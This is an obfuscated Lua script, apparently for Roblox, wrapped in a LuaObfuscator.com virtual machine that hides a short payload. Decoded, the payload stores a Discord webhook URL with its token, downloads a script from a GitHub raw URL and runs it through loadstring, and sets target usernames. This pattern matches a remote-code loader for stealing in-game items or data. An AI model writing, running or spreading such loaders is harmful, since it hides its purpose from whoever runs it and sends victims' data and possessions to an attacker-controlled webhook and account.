--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%((3 -1)^(((v33-(2 -1)) -(v32-(1 + 0))) + (620 -(555 + 64)))) ;return v82-(v82%1) ;else local v83=((1810 -(282 + 595)) -(857 + 74))^(v32-(569 -(367 + (1838 -(1523 + 114))))) ;return (((v31%(v83 + v83))>=v83) and (928 -(214 + 641 + 72))) or (0 -0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1068 -(68 + 978 + 19)) );v19=v19 + (1274 -(226 + 1044)) ;return (v37 * (73054774 -56277558)) + (v36 * 65536) + (v35 * (373 -(32 + 85))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v38==2) then v43=nil;v44=nil;v38=3;end if (v38~=3) then else v45=nil;v46=nil;v38=840 -(660 + 176) ;end if (v38~=0) then else v39=0 + 0 ;v40=nil;v38=1;end if (v38~=(203 -(14 + 188))) then else v41=nil;v42=nil;v38=322 -(53 + 267) ;end if ((679 -(534 + 141))~=v38) then else v47=nil;while true do if (v39==0) then local v98=0 + 0 ;while true do if (v98==(0 + 0)) then v40=0;v41=nil;v98=1 + 0 ;end if (v98==(1 -0)) then v39=1;break;end end end if (v39==(984 -(18 + 964))) then v44=nil;v45=nil;v39=4 -1 ;end if (1~=v39) then else v42=nil;v43=nil;v39=7 -5 ;end if (v39~=(8 -5)) then else v46=nil;v47=nil;v39=3 + 1 ;end if (v39==(854 -(20 + 830))) then while true do if (v40~=(0 + 0)) then else local v99=396 -(115 + 281) ;while true do if (0==v99) then v41=0;v42=nil;v99=1 + 0 ;end if (v99==(2 -1)) then v40=1 + 0 ;break;end end end if (v40~=(4 -2)) then else local v100=0 + 0 ;local v101;while true do if (v100~=(0 -0)) then else v101=867 -(550 + 317) ;while true do if (v101==(2 -1)) then v40=3;break;end if (v101==0) then local v127=0 -0 ;while true do if (v127==(1551 -(1126 + 425))) then v45=nil;v46=nil;v127=1 -0 ;end if (v127==(1 -0)) then v101=2 -1 ;break;end end end end break;end end end if (v40~=(286 -(134 + 151))) then else local v102=1665 -(970 + 695) ;local v103;while true do if (v102==(0 -0)) then v103=0 -0 ;while true do if (v103~=(1990 -(582 + 1408))) then else v43=nil;v44=nil;v103=3 -2 ;end if (v103~=(2 -1)) then else v40=2 -0 ;break;end end break;end end end if (v40~=3) then else v47=nil;while true do local v104=0 -0 ;while true do if (v104~=(1825 -(1195 + 629))) then else if (v41==(0 -0)) then local v128=0 + 0 ;local v129;local v130;while true do if (v128==1) then while true do if (v129==(977 -(553 + 424))) then v130=0 -0 ;while true do if (v130==(1 + 0)) then v44={};v45={v42,v43,nil,v44};v130=1 + 1 ;end if (v130==2) then v41=1;break;end if (v130~=0) then else local v170=780 -(162 + 618) ;local v171;while true do if (v170==(0 -0)) then v171=0;while true do if (v171==(0 + 0)) then local v179=0;while true do if (v179==1) then v171=1 + 0 ;break;end if (v179==(0 -0)) then v42={};v43={};v179=1 -0 ;end end end if (v171==(1 + 0)) then v130=1637 -(1373 + 263) ;break;end end break;end end end end break;end end break;end if (v128~=0) then else v129=1000 -(451 + 549) ;v130=nil;v128=1;end end end break;end if (v104==0) then if (v41==2) then local v131=0 + 0 ;local v132;while true do if (v131==(0 -0)) then v132=0 -0 ;while true do if (v132==(1384 -(746 + 638))) then local v168=753 -(239 + 514) ;local v169;while true do if (v168==0) then v169=0 + 0 ;while true do if (v169==(1329 -(797 + 532))) then local v178=0 + 0 ;while true do if (v178~=(0 -0)) then else for v180=1,v24() do local v181=0 -0 ;local v182;local v183;while true do if ((342 -(218 + 123))~=v181) then else while true do if (v182==(1581 -(1535 + 46))) then v183=v22();if (v21(v183,1 + 0 ,1131 -(369 + 761) )~=(0 + 0)) then else local v189=0;local v190;local v191;local v192;local v193;while true do if (v189==(0 -0)) then v190=0;v191=nil;v189=1 -0 ;end if (v189==(1 + 1)) then while true do if ((0 + 0)~=v190) then else local v195=0;while true do if ((561 -(306 + 254))~=v195) then else v190=337 -(144 + 192) ;break;end if (v195~=(0 + 0)) then else v191=v21(v183,2,219 -(42 + 174) );v192=v21(v183,4 + 0 ,5 + 1 );v195=1;end end end if ((3 -1)==v190) then local v196=1467 -(899 + 568) ;while true do if (v196==(1581 -(1183 + 397))) then v190=3;break;end if (v196==(0 + 0)) then local v202=0 -0 ;while true do if (v202==(603 -(268 + 335))) then if (v21(v192,291 -(60 + 230) ,573 -(426 + 146) )~=(1 + 0)) then else v193[2]=v47[v193[1458 -(282 + 1174) ]];end if (v21(v192,813 -(569 + 242) ,1977 -(1913 + 62) )==(2 -1)) then v193[7 -4 ]=v47[v193[1 + 2 ]];end v202=1934 -(565 + 1368) ;end if (v202~=(3 -2)) then else v196=1662 -(1477 + 184) ;break;end end end end end if (v190~=(1027 -(706 + 318))) then else if (v21(v192,3 + 0 ,1254 -(721 + 530) )==(1272 -(945 + 326))) then v193[860 -(564 + 292) ]=v47[v193[6 -2 ]];end v42[v180]=v193;break;end if (v190==(2 -1)) then local v198=0 -0 ;local v199;while true do if (v198~=(0 + 0)) then else v199=0;while true do if (v199==(1 + 0)) then v190=2;break;end if (v199==(700 -(271 + 429))) then local v203=476 -(41 + 435) ;while true do if (v203==(1 + 0)) then v199=1 + 0 ;break;end if (v203==(1500 -(1408 + 92))) then v193={v23(),v23(),nil,nil};if (v191==(0 + 0)) then local v208=0 + 0 ;local v209;while true do if (v208==(1171 -(418 + 753))) then v209=1138 -(782 + 356) ;while true do if (v209~=(0 + 0)) then else v193[1 + 2 ]=v23();v193[4]=v23();break;end end break;end end elseif (v191==(1 + 0)) then v193[1 + 2 ]=v24();elseif (v191==2) then v193[532 -(406 + 123) ]=v24() -((2 -0)^(1785 -(1749 + 20))) ;elseif (v191~=3) then else local v214=0 + 0 ;local v215;local v216;while true do if (v214==0) then v215=1322 -(1249 + 73) ;v216=nil;v214=1 + 0 ;end if ((3 -2)~=v214) then else while true do if (v215~=(0 + 0)) then else v216=0;while true do if (v216==(0 -0)) then v193[1148 -(466 + 679) ]=v24() -((1020 -(697 + 321))^16) ;v193[10 -6 ]=v23();break;end end break;end end break;end end end v203=1;end end end end break;end end end end break;end if ((1 -0)~=v189) then else local v194=0 -0 ;while true do if (v194==(0 -0)) then v192=nil;v193=nil;v194=1901 -(106 + 1794) ;end if (v194==1) then v189=1 + 1 ;break;end end end end end break;end end break;end if (v181~=0) then else v182=0;v183=nil;v181=1 + 0 ;end end end for v184=2 -1 ,v24() do v43[v184-(2 -1) ]=v29();end v178=2 -1 ;end if (v178==1) then v169=1;break;end end end if (v169==1) then v132=1228 -(322 + 905) ;break;end end break;end end end if (v132~=(612 -(602 + 9))) then else return v45;end end break;end end end if (1~=v41) then else local v133=114 -(4 + 110) ;while true do if (v133~=(585 -(57 + 527))) then else local v163=1189 -(449 + 740) ;local v164;while true do if ((872 -(826 + 46))==v163) then v164=0;while true do if (v164~=(948 -(245 + 702))) then else v133=1429 -(41 + 1386) ;break;end if (v164==(0 + 0)) then for v173=104 -(17 + 86) ,v46 do local v174=0 + 0 ;local v175;local v176;local v177;while true do if (v174==(0 -0)) then v175=0 -0 ;v176=nil;v174=1;end if (v174==(3 -2)) then v177=nil;while true do if (v175==(167 -(122 + 44))) then if (v176==1) then v177=v22()~=0 ;elseif (v176==2) then v177=v25();elseif (v176~=(5 -2)) then else v177=v26();end v47[v173]=v177;break;end if (v175==(0 -0)) then local v187=0 + 0 ;while true do if (v187==(1205 -(902 + 303))) then local v188=0 + 0 ;while true do if (v188==1) then v187=1 -0 ;break;end if (v188==(0 + 0)) then v176=v22();v177=nil;v188=1691 -(1121 + 569) ;end end end if (v187==(215 -(22 + 192))) then v175=66 -(30 + 35) ;break;end end end end break;end end end v45[1466 -(1404 + 59) ]=v22();v164=1;end end break;end end end if (v133==(2 + 0)) then v41=5 -3 ;break;end if ((1257 -(1043 + 214))~=v133) then else local v165=0 -0 ;while true do if (v165==(563 -(334 + 228))) then v133=1;break;end if (v165==0) then v46=v24();v47={};v165=3 -2 ;end end end end end v104=1213 -(323 + 889) ;end end end break;end end break;end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=1 -0 ;local v51=(v21(v49,1 + 0 ,256 -(141 + 95) ) * (2^(32 + 0))) + v48 ;local v52=v21(v49,53 -(41 -9) ,(1864 -(573 + 1217)) -43 );local v53=((v21(v49,8 + 24 )==(2 -(1 + 0))) and  -((850 -(254 + 595)) + 0)) or (1 + 0) ;if (v52==0) then if (v51==(0 -0)) then return v53 * (0 + 0) ;else v52=164 -(92 + 71) ;v50=0 + (126 -(55 + 71)) ;end elseif (v52==((9526 -6086) -1393)) then return ((v51==0) and (v53 * ((766 -(574 + 191))/(0 + 0)))) or (v53 * NaN) ;end return v8(v53,v52-(2562 -1539) ) * (v50 + (v51/(2^52))) ;end v26=nil;function v26(v54)local v55=(285 -(175 + 110)) + 0 ;local v56;local v57;while true do if ((808 -(118 + (1736 -1048)))==v55) then v57={};for v88=49 -(25 + 23) , #v56 do v57[v88]=v2(v1(v3(v56,v88,v88)));end v55=4 -(4 -3) ;end if (v55==(940 -((2510 -(503 + 1293)) + 225))) then v56=v3(v16,v19,(v19 + v54) -((5269 -3382) -(927 + 959)) );v19=v19 + v54 ;v55=6 -4 ;end if (v55==(8 -5)) then return v6(v57);end if (v55==(0 -0)) then v56=nil;if  not v54 then v54=v24();if (v54==(0 + 0)) then return "";end end v55=1 -0 ;end end end v18=5;end if (v18==2) then function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + 2 + 0 ;return (v60 * (1317 -(810 + 251))) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v84=0;while true do if (v84==0) then v20=v0(v3(v61,1,1));return "";end end else local v85=v2(v0(v61,16));if v20 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v85,v20);v20=nil;v90=1;end end else return v85;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end if (v87==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then do return;end else local v105=v80[2];local v106=v78[v80[3]];v78[v105 + 1 ]=v106;v78[v105]=v106[v80[4]];end elseif (v81<=2) then v78[v80[2]]=v64[v80[3]];elseif (v81>3) then local v134=0;local v135;while true do if (v134==0) then v135=v80[2];v78[v135]=v78[v135](v13(v78,v135 + 1 ,v73));break;end end else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=7) then if (v81<=5) then v72=v80[3];elseif (v81>6) then local v137=v80[2];local v138,v139=v71(v78[v137](v13(v78,v137 + 1 ,v80[3])));v73=(v139 + v137) -1 ;local v140=0;for v151=v137,v73 do v140=v140 + 1 ;v78[v151]=v138[v140];end else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=8) then local v113=0;local v114;while true do if (v113==0) then v114=v80[2];v78[v114]=v78[v114](v13(v78,v114 + 1 ,v73));break;end end elseif (v81>9) then v78[v80[2]]=v64[v80[3]];else v78[v80[2]]=v80[3];end elseif (v81<=15) then if (v81<=12) then if (v81==11) then local v115=0;local v116;local v117;while true do if (v115==1) then v78[v116 + 1 ]=v117;v78[v116]=v117[v80[4]];break;end if (v115==0) then v116=v80[2];v117=v78[v80[3]];v115=1;end end else v78[v80[2]]();end elseif (v81<=13) then local v118=v80[2];local v119,v120=v71(v78[v118](v13(v78,v118 + 1 ,v80[3])));v73=(v120 + v118) -1 ;local v121=0;for v124=v118,v73 do v121=v121 + 1 ;v78[v124]=v119[v121];end elseif (v81==14) then v72=v80[3];else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=18) then if (v81<=16) then v78[v80[2]][v80[3]]=v80[4];elseif (v81>17) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=19) then do return;end elseif (v81>20) then v78[v80[2]]();else v78[v80[2]]=v80[3];end v72=v72 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O313935313530322O363O3534333430362F45774761472O36454969415F412D6446526C543043636170467A4366372D35574A364577644B6C646E3637674A4D355F3176586A7249514450765773524D4F66636D2D39030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503073O0073706F31626F6203093O00557365724E616D653200173O0012143O00013O0026113O000E000100020004053O000E000100120A000100033O00301000010004000500120A000100063O00120A000200073O00200B000200020008001214000400094O0006000500014O000D000200054O000400013O00022O000C0001000100010004053O001600010026113O0001000100010004053O0001000100120A000100033O0030100001000A000B00120A000100033O0030100001000C000B0012143O00023O0004053O000100012O00013O00017O00",v9(),...);end
